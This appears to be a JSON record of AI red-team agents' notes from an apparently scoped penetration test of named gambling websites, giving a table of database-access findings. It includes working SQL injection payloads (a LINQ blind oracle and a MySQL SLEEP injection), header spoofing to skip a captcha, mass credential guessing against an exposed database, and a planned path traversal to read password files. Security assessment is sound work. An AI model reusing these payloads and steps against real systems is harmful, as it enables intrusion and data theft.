3e1689 / 7b54d6)", "agent_name": "Neonrush DB/ATO Chain Agent", "agent_id": "dc714870"}, {"note_id": "7b54d6", "title": "DB access path analysis — Red Team B (CONSOLIDATED)", "category": "plan", "tags": ["red-team-b", "db-access", "sql_injection", "consolidated", "vuln-0027", "vuln-0028"], "created_at": "2026-09-27T17:34:54.497292+00:00", "updated_at": "2026-09-27T20:15:14.573065+00:00", "content": "# DB access path analysis — Red Team B (CONSOLIDATED)\n\nAgent: Red Team B — DB Access Paths (872744d4). Goal: reach DATABASE access (read) on the 47 in-scope hosts, via (a) SQL/NoSQL injection or (b) exposed DB service / leaked DB credentials. Scope: the 47 listed hosts + their own subdomains only; vendor backends (progressplay.net, casino-pp.net, betable.com, hercules.app, convex.cloud, tech1960.workers.dev) excluded.\n\n## Headline — 2 DATABASE ACCESSES CONFIRMED\n1. **www.neonrush.com** (Cogni / ASP.NET Boilerplate + EF Core) — `sorting` parameter → Dynamic LINQ expression injection → SQL. **vuln-0027 (High 7.1, CWE-89)**.\n2. **api-qa.playuk.com** (Markor \"revolve\" player API, MySQL) — `bonusCode` parameter → time-based blind SQLi. **vuln-0028 (Medium 6.5, CWE-89)**.\n\nAll other app-layer SQLi surfaces ruled out with named controls; exposed DB services found but none yielded access.\n\n## Per-target matrix\n\n| Target | Vector | Status | Blocking control / Evidence |\n|---|---|---|---|\n| **www.neonrush.com** (Cogni / ABP, EF Core) | ABP `sorting` param → `IQueryable.OrderBy(dynamic LINQ)` → SQL | **CONFIRMED — DB access** (vuln-0027, High 7.1, CWE-89) | Blind oracle `sorting=IIF(<pred>, it.Id, it.Id/(it.Id-it.Id))` → HTTP 200 true / HTTP 500 (SQL divide-by-zero) false. Extracted `ClientIpAddress=8.8.8.8`, `UserId=1853837`, `TenantId=1`, PK `Id=22522637` (never returned by the API). `it.CreationTime.ToString(\"yyyy\")`→500 proves SQL translation. Systemic on userlogin/referafrienduser/freeentrycodeuser/transactionsuser. Session via `Abp.TenantId: 1` (captcha skip) + `X-Forwarded-For: 8.8.8.8`. |\n| www.neonrush.com | injection REACH extended to a related table | reach proven, extraction open | `it.Player.EmailAddress/UserName/PhoneNumber/DateOfBirth/Gender` → 200 (EF emits a JOIN to the players table) vs 500 for root-only/unknown members; extraction blocked by data availability (FreeEntryCode queryset empty; row creation gated by identity verification, getNewCode state 998). |\n| www.neonrush.com | classic value injection (`userId`, `filter`, OData) | ruled_out | `userId` strongly typed (400 on `1'`); `filter` literal LIKE; OData options ignored; EF.Property unresolved. |\n| **api-qa.playuk.com** (Markor \"revolve\", MySQL 8.0.42) | POST `/revolve/api/account/isBonusCodeValid` JSON `bonusCode` | **CONFIRMED — DB access** (vuln-0028, Medium 6.5, CWE-89) | Time-based blind SQLi: `bonusCode=TESTCODE' AND (SELECT 8983 FROM (SELECT(SLEEP(5)))Dynt) AND 'koru'='koru` → deterministic +5 s (5.2–5.6 s vs 0.2–0.5 s baseline); SLEEP(0) + `-- -` control inert; sqlmap flagged `MySQL >= 5.0.12 time-based blind`. **Read proven:** `version()=8.0.42-33`, `database()=revolve`. Auth required (401 code 2) but the player account is freely self-registerable → PR:L. Session re-acquired after the earlier failure by fixing register/lite (`countryCallingCode:\"44\"`, `lang:\"en\"`, `contactable*`, versions 11/33, realistic email domain). |\n| api-uat.playuk.com | same bonusCode injection | needs_follow_up | Presumed to reproduce on the shared build, but session acquisition on UAT is blocked by anti-fraud `code 3`; not exercised. |\n| api-qa/uat.playuk.com | all other reachable Revolve params (paging, dates, ids, enums, other strings) | ruled_out | Named controls: 3-month date-range validation (code 119/217); integer typing (223/124); date-format validation (153); alphabetic allowlists (219/220); enum validation (242/63); redemption-limit pre-check (241); generic 500. |\n| **jackpot.com** (IIS 10 / ASP.NET MVC 5.2) | SQLi in widget/checkout params; verbose-error connection-string leakage; `/trace.axd`, `/elmah.axd` | ruled_out | Identifier params Int32 model-bound (quote → MVC binding ArgumentException, not SQL). String params inert (ComplianceCheck → constant `NonCompliant`; CheckUser → empty 200; UsGame_PopUpText identical). Verbose errors expose only MVC binding/view exceptions — never `SqlException`/`System.Data.SqlClient`/connection string. `/%2ftrace.axd` → \"Trace Error\" (remote tracing disabled, localOnly); `/elmah.axd` 404. sqlmap BEUT \"not injectable\"; AWS WAF 403s injection tokens. |\n| **appmanager.tangobet.co.uk** (Betty Admin, Node/Express + Postgres) | `players/search` `search`/`sortField`/`advancedFilter` SQLi; DB reach | ruled_out | `search` = parameterized LIKE; `sortField` = allowlist (fail-safe default columns); `advancedFilter` = column allowlist (unknown fields ignored → returns ALL rows, so NOT a blind-extraction oracle); `page`/`limit` int-parsed; errors generic. DB is a Postgres addon on Railway's private network — all DB ports FILTERED from the edge (only 80/443). |\n| **WordPress fleet** (betmaze.co.uk, betsuna.com, jeffbet.net, mogobet.com, playuk.com, theonlinecasino.co.uk, promo.hotwinscasino.com) | SQLi (core `?s=`, REST, admin-ajax, plugin CVEs, custom-theme `fetch-*.php`); leaked DB creds | ruled_out | Core/REST use WP_Query + `$wpdb->prepare` (sqlmap \"not injectable\"); jeffbet admin-ajax sanitized; all plugins current stable (no applicable SQLi CVE); `fetch-*.php` proxy an external catalogue and ignore every parameter; `wp-abilities/v1/…/run` → 401. No DB creds exposed. |\n| **mogobet.com `wp-content/debug.log`** (vuln-0006) | DB creds / SQL errors in a public log | no_issue_found | 2,660-byte log = only PHP `array_filter()` theme fatals + path `/home/mogobet.com/public_html/`. No SQL text, table prefix, or DB host/user/password. |\n| **uat.uk-bingo.net / uat.pandabingo.com (`/api/cms` → Strapi)** | Strapi content-API filter injection | ruled_out | Strapi filters parameterized (Knex): `$eq`/`$startsWith`/`$ne` → filtered results with no error/boolean/timing SQLi; proxy GET/HEAD/OPTIONS-only. (Exposure itself = vuln-0003.) |\n| **77.68.12.66:3306** (Plesk MariaDB 10.5.29 — origin of promotions.pandabingo.com) | Internet-exposed DB service; credential access | **needs_follow_up** (exposure, no access) | No IP allowlist: handshake completes, `1045 Access denied` (not `1130`). 50,935 bounded attempts (default/blank, username/brand-derived, Plesk-style, NCSC top-10k) → **0 credentials**; no lockout; no user-enumeration oracle (identical 1045 + ~45 ms). Exposure real, no unauthorized access → no CVSS impact to report. |\n| **77.68.12.66:8443** (Plesk Obsidian 18.0.80-8) | Panel → recover DB credentials / Plesk CVE | ruled_out (+1 open gap) | API disabled for our IP and enforced on socket IP (errcode 1006) — forwarding-header spoofs do not bypass. phpMyAdmin → 303 to `/login.php`. Default/weak panel creds rejected. No applicable unauthenticated CVE. Gap: **sw-cp-server static-file path traversal** untested (443/8443 began refusing from our egress mid-test). |\n| **35.214.94.72 / 35.214.89.161** (GCP origins behind headless/staging WP subdomains) | Exposed MySQL 3306 + PostgreSQL 5432 | ruled_out | Source control before credential check: MySQL `ERROR 1130 Host … is not allowed`; PostgreSQL `FATAL: no pg_hba.conf entry`. Needs an allowlisted source IP or an on-host SSRF. |\n| same hosts + 77.68.12.66 | Exposed FTP 21 / IMAP 143,993 | ruled_out | Anonymous FTP rejected; authenticated access required. |\n| 209 resolving in-scope names | Leaked DB creds: .env, wp-config backups, .git, SQL dumps, appsettings, JS bundles | no_issue_found | No DB connection strings/credentials; gitleaks only re-found the already-reported game-provider keys (vuln-0008). `wp-config.*`/`*.sql` WAF-blocked (403) / 404. |\n| 20 reachable hosts | DB management consoles (phpMyAdmin/Adminer/…) | no_issue_found | 25 DB-admin paths → no HTTP 200 (only apex→www 301/302). |\n| 47 apexes + subdomains (port sweep) | Any open DB service | no_issue_found | No MSSQL/Oracle/MongoDB/Redis/Elasticsearch/memcached/CouchDB/Neo4j/Cassandra/Docker/etcd anywhere. Caution: 53 names behind Cloudflare/Imperva edges accept TCP on EVERY port — port-scan noise. |\n\n## Related findings already on file (not re-filed)\n- vuln-0022 (unauthenticated SSO token minting), vuln-0023 (login-attempts IDOR), vuln-0024 (Turnstile secretKey leak), vuln-0025 (captcha bypass) — neonrush/Cogni (Red Team C2).\n- vuln-0019 (DELETE returns bcrypt hash) — appmanager.tangobet.co.uk.\n\n## Open items (for the parent)\n1. **api-uat.playuk.com** — same `bonusCode` SQLi presumed but unverified (anti-fraud `code 3` blocks session acquisition there).\n2. **PlayUK write primitive** — only read access was demonstrated; stacked-query/write impact untested.\n3. **Cogni cross-table extraction** — needs a non-empty FreeEntryCode queryset (identity-verified player or the populated tenant 17).\n4. **MariaDB credential** on 77.68.12.66 — route is the Plesk sw-cp-server path traversal (`/etc/psa/.psa.shadow` + `secret_key`) when 8443 is reachable.\n5. **GCP MySQL/PostgreSQL** (35.214.94.72 / 35.214.89.161) — allowlisted IP or on-host SSRF required.\n6. Access-limited: `promo.hotwinscasino.com` origin 403; `betsuna.com` front-end unstable; post-auth WordPress plugin code untested.", "agent_name": "Red Team B — DB Access Paths", "agent_id": "872744d4"}], "filtered_count": 18, "total_count": 109}